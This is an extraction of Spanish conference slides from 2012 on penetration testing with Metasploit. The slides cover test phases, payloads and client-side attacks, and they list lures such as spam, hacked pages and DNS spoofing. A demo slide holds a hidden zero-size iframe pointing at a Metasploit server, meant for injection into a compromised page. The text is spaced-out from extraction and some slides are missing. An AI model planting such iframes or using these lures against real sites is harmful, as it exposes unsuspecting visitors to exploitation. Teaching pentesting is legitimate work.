Charla impartida por Pablo González, de la empresa Informática 64 para el evento Asegur@itCamp4! que tuvo lugar durante los días 26, 27 y 28 de Octubre de 2012 en El Escorial, Madrid.

1. Pe n t e s t i n g c o n
Me t a s p l o i t
F r a me w o r k
Pablo González

2. ¿Qué e s
Me t a s p l o i t ?
Es e l c a o s , p u r o
y b e l l o p o r
f u e r a , e t e r n o y
c o mp l e j o p o r
d e n t r o , e s p u r o
p e n t e s t i n g …

3. Ag e n d a
1. A r q u i t e c t u r a d e
Me t a s p l o i t
2. Fases de un test de intrusión
3. ¿Dónde p a r t i c i p a
Me t a s p l o i t ?
4. El arte de la intrusión
5. El bien y el mal…
6. D e m o
7. L a t i e n d a e n c a s a

4. Ar q u i t
e c t u r a ?

6. Fases Test Intrusión

7. Fa s e s
Alcance y términos del test de intrusión
Recolección de información
Análisis d e
v u l n e r a b i l i d a d e s
Explotación d e
v u l n e r a b i l i d a d e s
Post-Explotación d e l s i s t e m a
Generación d e i n f o r m e s

8. ¿Dónde
p a r t i c i p a ?

9. Lo importante es…
P a r t i c i p a r !!!
Recolección de información
Análisis d e
v u l n e r a b i l i d a d e s
Explotación d e
v u l n e r a b i l i d a d e s
Post-Explotación
Pero incluso… a y u d a a

10. El arte de la intrusión

11. ¿Arte o Ingeniería?
Pr o c e d u r e
p e n t e s t i n g ;
B E GI N
wr i t e l n („p a s o 1‟)
wr i t e l n („p a s o 2‟)
…
a r t e ;
END;
Pr o c e d u r e a r t e ;
…

12. Ámbito
Explotación vulnerabilidades (pero…)
B e s t a n d Wo r s t
Pr a c t i c e s

13. Elección d e l
p a y l o a d
Más d e 200 p a y l o a d s …
Son nuestras cartas… ¿Siempre
u s a r e mo s a l r e y ?

14. Tipos de Intrusión
¿Cómo l a n z o l o s
e x p l o i t s ?
Sin Interacción… (t e r r o r !)
Con Interacción… (c l i e n t -s i d e
a t t a c k !)

15. Cl i e n t Si d e
At t a c k !
D a r k S h a d o w s , ¿Cómo hago para
que hagan peticiones a mí?
M a i l i n g ? (s p a m ? ? )
 Foros…
 Páginas w e b h a c k e a d a s …
P u b l i c a c i o n e s e n
I n t e r n e t
A c o r t a d o r e s …
A t a q u e s l o c a l e s (D N S
Sp o o f )

16. El bien y el mal…

17. El límite
Debemos ser éticos… ¿Lo s o m o s ?
La delgada línea…
P o d e mo s u t i l i z a r l o s
a t a q u e s c l i e n t -s i d e
p a r a : (m u c h a s , m u c h a s
c o s a s )
Distribución malware…
P a y l o a d s p e r ma n e n t e s

18. D e mo : A
j u g a r !

19. ¿Qué v a m o s a
h a c e r ?
Escenario: (idea del mundo real… ^ ^ )
1. Página h a c k e a d a …
2. I f r a m e q u e a p u n t e a 1
s e r v e r c o n MS F
3. L a n z a m i e n t o d e
e x p l o i t s c o n t r a
c l i e n t e
4. Obtenemos el control…

20. I f r a me …
<i f r a m e
s r c =h t t p ://192.168.56.101:8080
/ w i d t h =0 h e i g h t =0
s t y l e =“h i d d e n ”
f r a m e b o r d e r =0
m a r g i n h e i g h t =0
m a r g i n w i d t h =0/>

23. L a t i e n d a
e n c a s a

24. He tenido el honor…
…y han tenido la paciencia…
Me t a s p l o i t p a r a
Pe n t e s t e r s